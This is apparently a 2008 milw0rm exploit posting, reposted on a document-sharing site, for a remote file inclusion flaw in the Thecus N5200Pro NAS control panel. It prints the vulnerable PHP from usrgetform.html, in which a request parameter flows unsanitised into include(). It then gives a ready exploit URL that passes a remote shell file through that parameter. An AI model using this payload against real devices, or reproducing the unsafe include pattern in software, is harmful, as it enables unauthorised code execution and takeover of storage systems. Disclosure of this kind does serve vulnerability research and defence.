Documents
Resources
Learning Center
Upload
Plans & pricing Sign in
Sign Out

Thecus N5200Pro NAS Server Control Panel RFI Vulnerability

VIEWS: 67 PAGES: 1

									                        Thecus N5200Pro NAS Server Control Panel RFI Vulnerability                          Page 1/1
  1    Thecus N5200Pro NAS Server Control Panel Remote File Ä°nclude
  2
  3
  4    Author : Crackers_Child
  5
  6    Mail    : cashr00t@hotmail.com
  7
  8    Bug in : usrgetform.html
  9
  10
  11   <?php
  12       $htm=$_REQUEST[’name’];
  13       require_once("/img/htdocs/webconfig");
  14       require_once("/img/www/inc/function.php");
  15       get_sysconf();
  16       $version=trim(shell_exec("/bin/cat /img/version"));
  17       $model=trim(shell_exec(’/bin/cat /proc/thecus_io | awk −F: \’/CPUFLAG/{printf("%s", $2)}\’’));
  18       if($model=="1"){
  19         $model_name=$webconfig[’product_no’].$webconfig[’pro’];
  20       }else{
  21         $model_name=$webconfig[’product_no’];
  22       }
  23       if (!$htm){
  24           print ’no name given’;
  25           exit;
  26       }
  27       if ($htm==’lang’) $htm=’../pub/lang’;
  28       session_start();
  29       header(’Content−type: text/html;charset=utf−8’);
  30       $lang=’en’;
  31       if (isset($_SESSION[’lang’])){$lang=$_SESSION[’lang’];};
  32       ob_start();
  33       include("$htm.htm");
  34       $html=ob_get_contents();
  35       ob_end_clean();
  36
  37        include_once(’header.html’);
  38   ?>
  39
  40
  41
  42   Exploit : www.site.com:9443/usr/usrgetform.html?name=Shelz?
  43
  44   Ä°nfo : http://www.thecus.com/products_over.php?cid=11&pid=8
  45
  46   Greetz: Str0ke
  47
  48   # milw0rm.com [2008−02−18]




Crackers_Child                                                                                              02/18/2008

								
To top